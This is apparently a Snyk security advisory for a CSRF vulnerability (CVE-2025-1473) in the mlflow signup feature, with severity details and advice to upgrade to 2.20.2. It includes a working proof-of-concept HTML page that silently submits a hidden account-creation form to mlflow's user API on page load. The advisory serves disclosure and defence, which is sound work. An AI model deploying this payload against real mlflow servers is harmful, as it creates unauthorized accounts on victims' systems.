Cross-site Request Forgery (CSRF) Affecting mlflow package, versions [,2.20.2)


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Cross-site Request Forgery (CSRF) vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-PYTHON-MLFLOW-9486736
  • published21 Mar 2025
  • disclosed20 Mar 2025
  • creditkrishnast545

Introduced: 20 Mar 2025

NewCVE-2025-1473  (opens in a new tab)
CWE-352  (opens in a new tab)

How to fix?

Upgrade mlflow to version 2.20.2 or higher.

Overview

mlflow is a platform to streamline machine learning development, including tracking experiments, packaging code into reproducible runs, and sharing and deploying models.

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) through the Signup feature. An attacker can create a new account, which may be used to perform unauthorized actions on behalf of the malicious user.

PoC

<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>CSRF Attack</title> </head> <body onload="document.forms['csrfForm'].submit();"> <form id="csrfForm" action="http://127.0.0.1:5000/api/2.0/mlflow/users/create" method="POST"> <input type="hidden" name="username" value="ROOT"> <input type="hidden" name="password" value="ROOT"> </form> </body> </html>

References

CVSS Base Scores

version 4.0
version 3.1